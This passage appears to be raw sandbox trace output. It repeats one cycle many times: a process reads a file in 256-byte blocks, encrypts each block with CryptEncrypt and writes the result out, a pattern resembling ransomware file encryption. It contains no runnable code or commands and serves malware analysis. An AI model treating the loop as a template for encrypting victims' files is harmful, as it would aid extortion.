lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.797] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.797] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.797] GetLastError () returned 0x0 [0144.797] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.797] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.798] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.798] GetLastError () returned 0x0 [0144.798] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.798] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.798] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.798] GetLastError () returned 0x0 [0144.798] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.798] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.798] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.798] GetLastError () returned 0x0 [0144.798] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.798] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.798] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.798] GetLastError () returned 0x0 [0144.798] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.798] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.798] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.798] GetLastError () returned 0x0 [0144.798] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.798] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.798] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.798] GetLastError () returned 0x0 [0144.798] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.798] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.798] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.799] GetLastError () returned 0x0 [0144.799] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.799] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.799] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.799] GetLastError () returned 0x0 [0144.799] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.799] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.799] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.799] GetLastError () returned 0x0 [0144.799] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.799] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.799] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.799] GetLastError () returned 0x0 [0144.799] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.799] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.799] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.799] GetLastError () returned 0x0 [0144.799] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.799] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.799] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.799] GetLastError () returned 0x0 [0144.799] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.799] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.799] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.799] GetLastError () returned 0x0 [0144.799] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.800] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.800] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.800] GetLastError () returned 0x0 [0144.800] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.800] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.800] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.800] GetLastError () returned 0x0 [0144.800] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.800] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.800] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.800] GetLastError () returned 0x0 [0144.800] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.800] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.800] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.800] GetLastError () returned 0x0 [0144.800] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.800] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.800] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.800] GetLastError () returned 0x0 [0144.800] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.800] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.800] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.800] GetLastError () returned 0x0 [0144.800] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.801] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.801] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.801] GetLastError () returned 0x0 [0144.801] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.801] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.801] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.801] GetLastError () returned 0x0 [0144.801] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.801] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.801] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.801] GetLastError () returned 0x0 [0144.801] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.801] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.801] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.801] GetLastError () returned 0x0 [0144.801] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.801] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.801] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.801] GetLastError () returned 0x0 [0144.801] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.802] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.802] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.802] GetLastError () returned 0x0 [0144.802] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.802] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.802] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.802] GetLastError () returned 0x0 [0144.802] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.802] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.802] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.802] GetLastError () returned 0x0 [0144.802] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.802] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.802] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.802] GetLastError () returned 0x0 [0144.802] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.802] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.802] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.802] GetLastError () returned 0x0 [0144.802] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.803] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.803] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.803] GetLastError () returned 0x0 [0144.803] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.803] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.803] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.803] GetLastError () returned 0x0 [0144.803] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.803] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, 